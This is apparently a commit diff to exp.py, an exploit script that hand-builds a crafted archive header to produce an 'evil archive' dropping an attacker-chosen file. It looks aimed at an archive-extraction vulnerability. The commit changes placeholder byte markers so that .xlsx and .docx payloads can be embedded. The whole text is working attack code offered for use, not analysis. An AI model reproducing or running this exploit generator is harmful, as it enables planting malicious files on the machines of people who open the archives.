fix the bug, now can add .xlsx .docx

WyAtu · Feb 22, 2019 · 5a2df20 · 5a2df20
1 parent dcd78e9
commit 5a2df20
Showing 1 changed file with 5 additions and 5 deletions.
diff --git a/exp.py b/exp.py
@@ -56,7 +56,7 @@ def get_right_hdr_crc(filename):
 
 def modify_hdr_crc(shellcode, filename):
     hdr_crc_raw = get_right_hdr_crc(filename)
-    shellcode_new = shellcode.replace("6666", hdr_crc_raw)
+    shellcode_new = shellcode.replace("6789", hdr_crc_raw)
     return shellcode_new
 
 def hex2raw4(hex_value):
@@ -76,7 +76,7 @@ def get_file_content(filename):
 def make_shellcode(filename, target_filename):
     if target_filename == "":
         target_filename = filename
-    hdr_crc_raw = "6666"
+    hdr_crc_raw = "6789"
     hdr_size_raw = hex2raw4(str(hex(len(target_filename)+31))[2:])
     packsize_raw = hex2raw8(str(hex(os.path.getsize(filename)))[2:])
     origsize_raw = packsize_raw
@@ -86,7 +86,7 @@ def make_shellcode(filename, target_filename):
     content_raw = get_file_content(filename)
     shellcode = hdr_crc_raw + hdr_size_raw + "010180" + packsize_raw \
               + origsize_raw + "63B0554E20000000" + crc32_raw + "00030A005445"\
-              + filename_len_raw + filename_raw + "8888888888888888888888888888"
+              + filename_len_raw + filename_raw + "01020304050607080910A1A2A3A4A5A6A7A8A9"
     return shellcode
 
 def build_file(shellcode, filename):
@@ -102,7 +102,7 @@ def build_file_once(filename, target_filename=""):
     build_file_add(shellcode, rar_filename)
     shellcode_new = modify_hdr_crc(shellcode, rar_filename)
     content_raw = get_file_content(rar_filename).upper()
-    build_file(content_raw.replace(shellcode.upper(), shellcode_new.upper()).replace("8888888888888888888888888888", get_file_content(filename)), rar_filename)
+    build_file(content_raw.replace(shellcode.upper(), shellcode_new.upper()).replace("01020304050607080910A1A2A3A4A5A6A7A8A9", get_file_content(filename)), rar_filename)
 
 if __name__ == '__main__':
     print("[*] Start to generate the archive file %s..."%(rar_filename))
@@ -115,4 +115,4 @@ def build_file_once(filename, target_filename=""):
 
     build_file_once(evil_filename, target_filename)
 
-    print("[+] Evil archive file %s generated successfully !"%(rar_filename))
+    print("[+] Evil archive file %s generated successfully !"%(rar_filename))